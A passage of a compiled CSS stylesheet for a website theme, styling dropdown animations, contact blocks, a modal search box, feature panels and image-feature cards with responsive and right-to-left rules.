  -moz-animation-name: g-dropdown-zoom;
  animation-name: g-dropdown-zoom;
}
.g-main-nav .g-fullwidth > .g-fade-in-up.g-active {
  -webkit-animation-duration: 0.3s;
  -moz-animation-duration: 0.3s;
  animation-duration: 0.3s;
  -webkit-animation-name: g-dropdown-fade-in-up;
  -moz-animation-name: g-dropdown-fade-in-up;
  animation-name: g-dropdown-fade-in-up;
}
@-webkit-keyframes g-dropdown-zoom {
  0% {
    opacity: 0;
    -webkit-transform: scale3d(0.8, 0.8, 0.8);
  }
  100% {
    opacity: 1;
  }
}
@-moz-keyframes g-dropdown-zoom {
  0% {
    opacity: 0;
    -moz-transform: scale3d(0.8, 0.8, 0.8);
  }
  100% {
    opacity: 1;
  }
}
@keyframes g-dropdown-zoom {
  0% {
    opacity: 0;
    -webkit-transform: scale3d(0.8, 0.8, 0.8);
    -moz-transform: scale3d(0.8, 0.8, 0.8);
    -ms-transform: scale3d(0.8, 0.8, 0.8);
    -o-transform: scale3d(0.8, 0.8, 0.8);
    transform: scale3d(0.8, 0.8, 0.8);
  }
  100% {
    opacity: 1;
  }
}
@-webkit-keyframes g-dropdown-fade-in-up {
  0% {
    opacity: 0;
    -webkit-transform: translate3d(0, 30px, 0);
  }
  100% {
    opacity: 1;
  }
}
@-moz-keyframes g-dropdown-fade-in-up {
  0% {
    opacity: 0;
    -moz-transform: translate3d(0, 30px, 0);
  }
  100% {
    opacity: 1;
  }
}
@keyframes g-dropdown-fade-in-up {
  0% {
    opacity: 0;
    -webkit-transform: translate3d(0, 30px, 0);
    -moz-transform: translate3d(0, 30px, 0);
    -ms-transform: translate3d(0, 30px, 0);
    -o-transform: translate3d(0, 30px, 0);
    transform: translate3d(0, 30px, 0);
  }
  100% {
    opacity: 1;
  }
}
.g-content-array {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
.g-content-array .g-grid {
  margin-bottom: 2.3445rem;
}
.g-content-array .g-grid:last-child {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-content-array .g-grid:last-child .g-block:last-child .g-array-item {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-content-array .g-grid {
    margin-bottom: 0;
  }
}
.g-content-array .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-content-array .g-array-item {
    margin-bottom: 2.3445rem;
  }
}
.g-content-array .g-array-item-image {
  margin: 0 0 15px 0;
}
.g-content-array .g-item-title {
  margin: 0;
}
.g-content-array .g-array-item-details, .g-content-array .g-array-item-text, .g-content-array .g-array-item-read-more {
  margin: 15px 0 0;
}
.g-content-array .g-array-item-details {
  font-size: 90%;
}
.g-content-array .g-array-item-details > span {
  margin-right: 10px;
}
.g-content-array .g-array-item-details i {
  margin-right: 5px;
}
.g-contacts .g-grid {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
.g-contacts .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
.g-contacts .g-contacts-item {
  text-align: left;
}
@media only all and (max-width: 47.99rem) {
  .g-contacts .g-contacts-item {
    margin-left: 0 !important;
    margin-right: 0 !important;
    display: block !important;
  }
  .g-contacts .g-contacts-item:last-child {
    margin-bottom: 0 !important;
  }
}
.g-contacts.vertical .g-contacts-item {
  display: block;
}
.g-contacts.horizontal .g-contacts-item:not(.g-block) {
  display: inline-block;
  margin-right: 35px;
}
.g-contacts.horizontal .g-contacts-item:not(.g-block):last-child {
  margin-right: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-contacts.style1 .g-contacts-item {
    margin-bottom: 7px;
  }
}
.g-contacts.style1 .g-contacts-icon {
  margin-right: 5px;
}
.g-contacts.style1.vertical .g-contacts-item {
  margin-bottom: 7px;
}
.g-contacts.style1.vertical .g-contacts-item:last-child {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-contacts.style2 .g-contacts-item {
    margin-bottom: 25px;
  }
  .g-contacts.style2 .g-contacts-item:not(.g-block) .g-contacts-icon {
    margin-top: 0 !important;
  }
}
.g-contacts.style2 .g-contacts-item.g-block {
  align-self: center;
}
.g-contacts.style2.horizontal .g-contacts-item:not(.g-block) .g-contacts-icon {
  margin-top: -5px;
}
.g-contacts.style2 .g-contacts-icon {
  float: left;
  border: 2px solid #dddddd;
  border-radius: 50%;
  font-size: 18px;
  height: 45px;
  line-height: 45px;
  text-align: center;
  width: 45px;
  color: #4f953b;
}
.g-contacts.style2 .g-contacts-icon > span {
  position: relative;
  top: -1px;
}
.g-contacts.style2 .g-title-value-container {
  margin-left: 60px;
}
.g-contacts.style2 .g-contact-title {
  margin-top: -5px;
  margin-bottom: 0;
}
.g-contacts.style2.vertical .g-contacts-item {
  margin-bottom: 25px;
}
.g-contacts.style2.vertical .g-contacts-item:last-child {
  margin-bottom: 0;
}
#g-top .g-contacts .g-contacts-item {
  display: inline-block;
  padding: 11px 15px;
  border-right: 1px solid white;
  margin-left: -4px;
  margin-bottom: 0;
}
#g-top .g-contacts .g-contacts-item:first-child {
  border-left: 1px solid white;
  margin-left: 0;
}
#g-top .g-contacts .g-contacts-item:last-child {
  margin-right: 0;
}
#g-top .g-contacts .g-contacts-item > a {
  color: #959595;
}
#g-offcanvas .g-contacts .g-contacts-item {
  margin-left: 0 !important;
  margin-right: 0 !important;
  display: block !important;
}
#g-offcanvas .g-contacts .g-contacts-item:last-child {
  margin-bottom: 0 !important;
}
#g-offcanvas .g-contacts.style1 .g-contacts-item {
  margin-bottom: 7px;
}
#g-offcanvas .g-contacts.style2 .g-contacts-item {
  margin-bottom: 25px;
}
#g-offcanvas .g-contacts.style2 .g-contacts-item:not(.g-block) .g-contacts-icon {
  margin-top: 0 !important;
}
#g-offcanvas .g-contacts .g-block {
  -webkit-flex-grow: 0;
  -moz-flex-grow: 0;
  flex-grow: 0;
  -ms-flex-positive: 0;
  -webkit-flex-basis: 100%;
  -moz-flex-basis: 100%;
  flex-basis: 100%;
  -ms-flex-preferred-size: 100%;
}
[dir="rtl"] #g-top .g-contacts .g-contacts-item {
  border-right: none;
  border-left: 1px solid white;
}
[dir="rtl"] #g-top .g-contacts .g-contacts-item:first-child {
  border-right: 1px solid white;
}
[dir="rtl"] .g-contacts .g-contacts-item {
  text-align: right;
}
[dir="rtl"] .g-contacts.horizontal .g-contacts-item:not(.g-block) {
  display: inline-block;
  margin-left: 35px;
  margin-right: 0;
}
[dir="rtl"] .g-contacts.horizontal .g-contacts-item:not(.g-block):last-child {
  margin-left: 0;
}
[dir="rtl"] .g-contacts.style1 .g-contacts-icon {
  margin-left: 5px;
  margin-right: 0;
}
[dir="rtl"] .g-contacts.style2 .g-contacts-icon {
  float: right;
}
[dir="rtl"] .g-contacts.style2 .g-title-value-container {
  margin-right: 60px;
  margin-left: 0;
}
.modal-search-container.style1 .uk-modal-dialog {
  text-align: left;
}
.modal-search-container.style1 .uk-modal-dialog .search form {
  margin-bottom: 0;
}
.modal-search-container.style1 .uk-modal-dialog .search input {
  margin-bottom: 0;
  border: none;
  box-shadow: none !important;
  font-size: 2rem;
  color: #959595;
}
.modal-search-container.style1 .uk-modal-dialog .search-form .search-field {
  border: none;
  box-shadow: none !important;
  font-size: 2rem;
  color: #959595;
}
.modal-search-container.style1 .uk-modal-dialog .search-form label {
  margin-bottom: 0;
}
.modal-search-container.style1 .uk-modal-dialog .search-form .search-submit {
  display: none;
}
.modal-search-container.style1 .uk-modal-dialog .search-input {
  border: none;
  box-shadow: none !important;
  font-size: 2rem;
  color: #959595;
}
.modal-search-container.style2 #modal-search {
  background: rgba(0, 0, 0, 0.7);
}
.modal-search-container.style2 #modal-search.uk-open .uk-modal-dialog {
  -webkit-transform: scale(1);
  -moz-transform: scale(1);
  -ms-transform: scale(1);
  -o-transform: scale(1);
  transform: scale(1);
}
.modal-search-container.style2 #modal-search.uk-open .uk-close {
  -webkit-transform: scale(1);
  -moz-transform: scale(1);
  -ms-transform: scale(1);
  -o-transform: scale(1);
  transform: scale(1);
}
.modal-search-container.style2 #modal-search .uk-modal-dialog {
  padding: 0;
  border-radius: 0;
  width: 455px;
  background: none;
  box-shadow: none;
  -webkit-transform: scale(0);
  -moz-transform: scale(0);
  -ms-transform: scale(0);
  -o-transform: scale(0);
  transform: scale(0);
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search form {
  margin-bottom: 0;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input {
  margin-bottom: 0;
  border: none;
  font-size: 2.3rem;
  width: 455px;
  color: #ffffff;
  text-align: center;
  background: none;
  padding: 20px;
  border-radius: 0;
  box-shadow: 0 3px 0 0 rgba(255, 255, 255, 0.3);
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input::-webkit-input-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input::-moz-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input:-moz-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input:-ms-input-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input:focus {
  box-shadow: 0 3px 0 0 white;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field {
  border: none;
  font-size: 2.3rem;
  width: 455px;
  color: #ffffff;
  text-align: center;
  background: none;
  padding: 20px;
  border-radius: 0;
  box-shadow: 0 3px 0 0 rgba(255, 255, 255, 0.3);
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field::-webkit-input-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field::-moz-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field:-moz-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field:-ms-input-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field:focus {
  box-shadow: 0 3px 0 0 white;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form label {
  margin-bottom: 0;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-submit {
  display: none;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input {
  border: none;
  font-size: 2.3rem;
  width: 455px;
  color: #ffffff;
  text-align: center;
  background: none;
  padding: 20px;
  border-radius: 0;
  box-shadow: 0 3px 0 0 rgba(255, 255, 255, 0.3);
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input::-webkit-input-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input::-moz-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input:-moz-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input:-ms-input-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input:focus {
  box-shadow: 0 3px 0 0 white;
}
.modal-search-container.style2 #modal-search .uk-close {
  color: #ffffff !important;
  opacity: 1;
  font-size: 22px;
  top: 35px;
  right: 35px;
  position: absolute;
  -webkit-transform: scale(0);
  -moz-transform: scale(0);
  -ms-transform: scale(0);
  -o-transform: scale(0);
  transform: scale(0);
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
.modal-search-container.style2 #modal-search .uk-close:hover {
  -webkit-transform: rotate(90deg);
  -moz-transform: rotate(90deg);
  -ms-transform: rotate(90deg);
  -o-transform: rotate(90deg);
  transform: rotate(90deg);
  color: #4f953b !important;
}
.modal-search-container .element-invisible {
  border: 0 none;
  height: 1px;
  margin: 0;
  overflow: hidden;
  padding: 0;
  position: absolute;
  width: 1px;
}
.modal-search-container i {
  opacity: 1 !important;
}
.offcanvas-toggle-particle.g-offcanvas-toggle {
  display: block;
  position: relative;
  top: auto;
  left: auto;
  right: auto;
  color: inherit;
  font-size: inherit;
  line-height: inherit;
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
.offcanvas-toggle-particle i {
  opacity: 1 !important;
}
.g-features-particle, .g-features2-particle {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
.g-features-particle .g-grid, .g-features2-particle .g-grid {
  margin-bottom: 2.3445rem;
}
.g-features-particle .g-grid:last-child, .g-features2-particle .g-grid:last-child {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle .g-grid:last-child .g-features-particle-item:last-child, .g-features2-particle .g-grid:last-child .g-features-particle-item:last-child {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle .g-grid, .g-features2-particle .g-grid {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle .g-features-particle-item, .g-features-particle .g-features2-particle-item, .g-features2-particle .g-features-particle-item, .g-features2-particle .g-features2-particle-item {
    margin-bottom: 2.3445rem;
  }
}
.g-features-particle .size-33, .g-features2-particle .size-33 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 33.3333%;
  -moz-flex: 0 33.3333%;
  -ms-flex: 0 33.3333%;
  flex: 0 33.3333%;
  width: 33.3333%;
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle .size-33, .g-features2-particle .size-33 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
.g-features-particle .size-16, .g-features2-particle .size-16 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 16.6666%;
  -moz-flex: 0 16.6666%;
  -ms-flex: 0 16.6666%;
  flex: 0 16.6666%;
  width: 16.6666%;
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle .size-16, .g-features2-particle .size-16 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
.g-features-particle .g-content, .g-features2-particle .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
.g-features-particle p, .g-features2-particle p {
  margin: 0;
}
.g-features-particle .g-features-particle-button, .g-features-particle .g-features-particle-subs, .g-features2-particle .g-features-particle-button, .g-features2-particle .g-features-particle-subs {
  margin-top: 20px;
}
.g-features-particle {
  text-align: center;
}
.g-features-particle .g-features-particle-title {
  margin-top: 0.75rem;
  margin-bottom: 1rem;
}
.g-features-particle .g-features-particle-title a {
  color: #282828;
}
.g-features-particle .g-features-particle-title a:hover {
  color: #4f953b;
}
.g-features-particle .g-features-particle-icon, .g-features-particle .g-circle-border {
  border-radius: 50%;
  font-size: 2rem;
  height: 100px;
  width: 100px;
  line-height: 100px;
  text-align: center;
  vertical-align: middle;
  margin-bottom: 0.75rem;
  color: #4f953b;
  position: relative;
  display: inline-block;
  -webkit-transition: all 0.2s linear 0s;
  -moz-transition: all 0.2s linear 0s;
  transition: all 0.2s linear 0s;
}
.g-features-particle .g-circle-border {
  background: transparent none repeat scroll 0 0;
  border: 1px solid #dddddd;
  height: 98px;
  width: 98px;
  left: 1px;
  top: 1px;
  z-index: 1;
  position: absolute;
  -webkit-transition-timing-function: cubic-bezier(0.5, -0.7, 0.67, 0.7);
  -moz-transition-timing-function: cubic-bezier(0.5, -0.7, 0.67, 0.7);
  transition-timing-function: cubic-bezier(0.5, -0.7, 0.67, 0.7);
}
.g-features-particle .g-features-particle-image {
  margin-bottom: 0.75rem;
  display: inline-block;
}
.g-features-particle .g-features-particle-item .g-content:hover .g-features-particle-icon {
  color: #ffffff;
  background: #4f953b;
}
.g-features-particle .g-features-particle-item .g-content:hover .g-circle-border {
  border-color: #4f953b;
  -webkit-transform: scale(1.18);
  -moz-transform: scale(1.18);
  -ms-transform: scale(1.18);
  -o-transform: scale(1.18);
  transform: scale(1.18);
  -webkit-transition-timing-function: cubic-bezier(0.4, 0.25, 0.14, 1.73);
  -moz-transition-timing-function: cubic-bezier(0.4, 0.25, 0.14, 1.73);
  transition-timing-function: cubic-bezier(0.4, 0.25, 0.14, 1.73);
}
.g-features-particle.style6 .g-grid {
  margin-bottom: 1.876rem;
}
.g-features-particle.style6 .g-grid .g-block {
  padding: 0 0.938rem;
}
.g-features-particle.style6 .g-grid:last-child {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle.style6 .g-grid:last-child .g-features-particle-item:last-child {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle.style6 .g-grid {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle.style6 .g-features-particle-item {
    margin-bottom: 1.876rem;
  }
}
.g-features-particle.style6 .g-content {
  padding: 3rem 2.5rem;
  background: #ffffff;
  border: 1px solid #dddddd;
}
.g-features-particle.style6 .g-features-particle-icon, .g-features-particle.style6 .g-features-particle-image {
  margin-bottom: 1.25rem;
}
.g-features-particle.style6 .g-features-particle-title {
  margin-bottom: 1.5rem;
}
.g-features-particle.style6 .g-features-particle-button, .g-features-particle.style6 .g-features-particle-subs {
  margin-top: 30px;
}
.g-features-particle.style6 .g-subs-item {
  padding: 10px 0;
  border-bottom: 1px solid #dddddd;
}
.g-features-particle.style6 .g-subs-item:last-child {
  border-bottom: none;
}
.g-features-particle.style7 .g-grid {
  margin-bottom: 1.876rem;
}
.g-features-particle.style7 .g-grid .g-block {
  padding: 0 0.938rem;
}
.g-features-particle.style7 .g-grid:last-child {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle.style7 .g-grid:last-child .g-features-particle-item:last-child {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle.style7 .g-grid {
    margin-bottom: 0;
  }
}
.g-features-particle.style7 .g-features-particle-item {
  margin-top: 40px;
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle.style7 .g-features-particle-item {
    margin-bottom: 1.876rem;
  }
}
.g-features-particle.style7 .g-content {
  padding: 25px;
  background: #ffffff;
  border: 1px solid #dddddd;
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
.g-features-particle.style7 .g-content:hover {
  border-color: #282828;
}
.g-features-particle.style7 .g-content:hover .g-features-particle-icon {
  background: #282828;
}
.g-features-particle.style7 .g-features-particle-item-inner {
  margin-top: -64px;
}
.g-features-particle.style7 .g-features-particle-icon, .g-features-particle.style7 .g-features-particle-image {
  margin-bottom: 1.25rem;
}
.g-features-particle.style7 .g-features-particle-icon .g-circle-border, .g-features-particle.style7 .g-features-particle-image .g-circle-border {
  display: none;
}
.g-features-particle.style7 .g-features-particle-icon {
  width: 75px;
  height: 75px;
  line-height: 75px;
  border-radius: 0;
  background: #4f953b;
  color: #ffffff;
  font-size: 24px;
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
.g-features-particle.style7 .g-features-particle-title {
  margin-bottom: 1rem;
  text-transform: uppercase;
}
.g-features-particle.style7 .g-features-particle-button, .g-features-particle.style7 .g-features-particle-subs {
  margin-top: 30px;
}
.g-features-particle.style7 .g-subs-item {
  padding: 10px 0;
  border-bottom: 1px solid #dddddd;
}
.g-features-particle.style7 .g-subs-item:last-child {
  border-bottom: none;
}
.g-features-particle.style8 {
  margin-left: 0;
  margin-right: 0;
  color: #ffffff;
  text-align: left;
}
.g-features-particle.style8 .g-grid {
  margin-bottom: 0;
}
.g-features-particle.style8 .g-grid:last-child .g-features-particle-item {
  box-shadow: -20px 0 20px -20px rgba(0, 0, 0, 0.07) inset;
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle.style8 .g-grid:last-child .g-features-particle-item {
    box-shadow: 0 -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
  }
}
.g-features-particle.style8 .g-grid:last-child .g-features-particle-item:last-child {
  box-shadow: 0 0 20px -20px rgba(0, 0, 0, 0.07) inset;
}
.g-features-particle.style8 .g-features-particle-item {
  padding: 35px 30px 40px;
  box-shadow: -20px -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
}
.g-features-particle.style8 .g-features-particle-item:nth-child(1) {
  background: #40782f;
}
.g-features-particle.style8 .g-features-particle-item:nth-child(2) {
  background: #478635;
}
.g-features-particle.style8 .g-features-particle-item:nth-child(3) {
  background: #4f953b;
}
.g-features-particle.style8 .g-features-particle-item:nth-child(4) {
  background: #57a441;
}
.g-features-particle.style8 .g-features-particle-item:nth-child(5) {
  background: #5eb247;
}
.g-features-particle.style8 .g-features-particle-item:nth-child(6) {
  background: #6abb53;
}
.g-features-particle.style8 .g-features-particle-item:last-child {
  box-shadow: 0 -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle.style8 .g-features-particle-item {
    box-shadow: 0 -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
    margin-bottom: 0;
  }
}
.g-features-particle.style8 .g-features-particle-icon, .g-features-particle.style8 .g-features-particle-image {
  margin-bottom: 10px;
  color: #ffffff;
  border-radius: 0;
  width: auto;
  height: auto;
  line-height: inherit;
  font-size: 40px;
}
.g-features-particle.style8 .g-features-particle-icon .g-circle-border, .g-features-particle.style8 .g-features-particle-image .g-circle-border {
  display: none;
}
.g-features-particle.style8 .g-features-particle-title {
  color: #ffffff !important;
  font-size: 1.35rem;
}
.g-features-particle.style8 .g-features-particle-title a {
  color: #ffffff;
}
.g-features-particle.style8 .g-features-particle-title a:hover {
  text-decoration: underline;
}
.g-features-particle.style8 .g-features-particle-desc, .g-features-particle.style8 .g-features-particle-subs {
  opacity: 0.85;
}
.g-features-particle.style8 .g-features-particle-button {
  margin-top: 25px;
}
.g-features-particle.style8 .g-features-particle-button .button {
  background: none;
  border: 2px solid #ffffff;
  color: #ffffff;
  border-radius: 50px;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
.g-features-particle.style8 .g-features-particle-button .button:hover {
  background: #282828;
  border-color: #282828;
}
.g-features-particle.style8.pull-up {
  margin-top: -7.5rem;
  position: relative;
  z-index: 4;
}
.g-features2-particle .g-features2-particle-title {
  margin-top: 0;
  margin-bottom: 1rem;
}
.g-features2-particle .g-features2-particle-title a {
  color: #282828;
}
.g-features2-particle .g-features2-particle-title a:hover {
  color: #4f953b;
}
.g-features2-particle .g-features2-particle-icon {
  margin-right: 20px;
  color: #4f953b;
  font-size: 130%;
}
.g-features2-particle .g-features2-particle-image {
  margin-right: 20px;
  display: inline-block;
}
.g-features2-particle.style3 .g-grid .g-block {
  padding: 0 1rem;
}
.g-features2-particle.style3 .g-content {
  padding-top: 1rem;
  padding-bottom: 1rem;
  background: rgba(0, 0, 0, 0.2);
}
.g-features2-particle.style3 .g-content:after {
  content: "";
  width: 0;
  height: 0;
  border-top: 15px solid rgba(0, 0, 0, 0.2);
  border-right: 15px solid transparent;
  position: absolute;
  margin-top: 16px;
  margin-left: -15px;
  z-index: 99;
}
.g-features2-particle.style4 .g-features2-particle-icon {
  float: left;
  font-size: 55px;
  margin-right: 0;
  color: #bbb;
}
.g-features2-particle.style4 .g-features2-particle-image {
  float: left;
  margin: 5px 0 0;
  max-width: 60px;
}
.g-features2-particle.style4 .g-title-desc-container {
  margin-left: 75px;
}
.g-features2-particle.style4 .g-features2-particle-title {
  margin-bottom: 10px;
}
.g-features2-particle.style4 .accent1 .g-features2-particle-icon {
  color: #4f953b;
}
.g-features2-particle.style4 .accent2 .g-features2-particle-icon {
  color: #282828;
}
.g-features2-particle.style5 .g-features2-particle-icon {
  float: left;
  font-size: 24px;
  margin-right: 0;
  color: #afafaf;
  width: 60px;
  height: 60px;
  line-height: 60px;
  text-align: center;
  margin-top: 5px;
  border: 1px solid;
  border-radius: 50%;
}
.g-features2-particle.style5 .g-features2-particle-image {
  float: left;
  margin: 5px 0 0;
  width: 60px;
  height: 60px;
}
.g-features2-particle.style5 .g-features2-particle-image img {
  border-radius: 50%;
  width: 60px;
  height: 60px;
}
.g-features2-particle.style5 .g-title-desc-container {
  margin-left: 75px;
}
.g-features2-particle.style5 .g-features2-particle-title {
  margin-bottom: 10px;
}
.g-features2-particle.style5 .accent1 .g-features2-particle-icon {
  color: #4f953b;
}
.g-features2-particle.style5 .accent2 .g-features2-particle-icon {
  color: #282828;
}
.g-image-features {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
.g-image-features .g-grid {
  margin-bottom: 1.876rem;
}
.g-image-features .g-grid:last-child {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-image-features .g-grid:last-child .g-block:last-child .g-image-features-item {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-image-features .g-grid {
    margin-bottom: 0;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.99rem) {
  .g-image-features > .g-grid > .g-block {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    margin-bottom: 1.876rem;
  }
  .g-image-features > .g-grid > .g-block:last-child {
    margin-bottom: 0;
  }
}
.g-image-features .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
.g-image-features .g-image-features-item {
  background: #ffffff;
  border: 1px solid #e2e2e2;
  box-shadow: 0 3px 3px rgba(0, 0, 0, 0.07);
  border-radius: 3px;
}
@media only all and (max-width: 47.99rem) {
  .g-image-features .g-image-features-item {
    margin-bottom: 2.3445rem;
  }
}
.g-image-features .g-image-features-item.layout-right .g-image-features-image.uk-overlay {
  border-radius: 0 3px 3px 0;
}
.g-image-features .g-image-features-item.layout-right .g-image-features-image img {
  border-radius: 0 3px 3px 0;
}
.g-image-features .g-image-features-image {
  position: relative;
}
.g-image-features .g-image-features-image img {
  width: 100%;
  border-radius: 3px 0 0 3px;
}
.g-image-features .g-image-features-image .uk-overlay-icon:before {
  content: "";
}
.g-image-features .g-image-features-image.uk-overlay {
  border-radius: 3px 0 0 3px;
}
.g-image-features .g-image-features-image.uk-overlay img {
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
.g-image-features .g-image-features-image:hover.uk-overlay img {
  -webkit-transform: scale(1.15);
  -moz-transform: scale(1.15);
  -ms-transform: scale(1.15);
  -o-transform: scale(1.15);
  transform: scale(1.15);
}
.g-image-features .g-image-features-image .uk-overlay-panel {
  z-index: 4;
}
.g-image-features .g-image-features-content {
  padding: 20px;
}
.g-image-features .g-image-features-desc {
  margin: 0;
}
.g-image-features .g-image-features-title {
  margin-top: 0;
  margin-bottom: 1rem;
}
.g-image-features .g-image-features-title a {
  color: #282828;
}
.g-image-features .g-image-features-title a:hover {
  color: #4f953b;
}
.g-image-features .g-bottom-info {
  margin-top: 15px;
}
.g-image-features .g-image-feature-special {
  color: #c8c8c8;
  font-style: italic;
  float: left;
}
@media only all and (max-width: 30rem) {
  .g-image-features .g-image-feature-special {
    float: none;
  }
}
.g-image-features .g-image-feature-special i {
  margin-right: 5px;
}
.g-image-features .g-image-features-link {
  font-style: italic;
  float: right;
}
@media only all and (max-width: 30rem) {
  .g-image-features .g-image-features-link {
    float: none;
    margin-top: 5px;
  }
}
.g-image-features .g-image-features-link i {
  margin-left: 10px;
}
.g-image-features .no-special .g-image-features-link {
  float: none;
}
.g-content-pro:not(.gutter-disabled) {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
.g-content-pro:not(.gutter-disabled) > .g-grid {
  margin-bottom: 1.876rem;
}
.g-content-pro:not(.gutter-disabled) > .g-grid:last-child {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro:not(.gutter-disabled) > .g-grid:last-child > .g-block:last-child .g-content-pro-item {
    margin-bottom: 0 !important;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro:not(.gutter-disabled) > .g-grid {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro:not(.gutter-disabled) .g-content-pro-item {
    margin-bottom: 1.876rem !important;
  }
}
.g-content-pro .size-33 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 33.3333%;
  -moz-flex: 0 33.3333%;
  -ms-flex: 0 33.3333%;
  flex: 0 33.3333%;
  width: 33.3333%;
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro .size-33 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
.g-content-pro .size-16 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 16.6666%;
  -moz-flex: 0 16.6666%;
  -ms-flex: 0 16.6666%;
  flex: 0 16.6666%;
  width: 16.6666%;
}
@media only all and (max-width: 47.99rem) {
  .g-content-pro .size-16 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
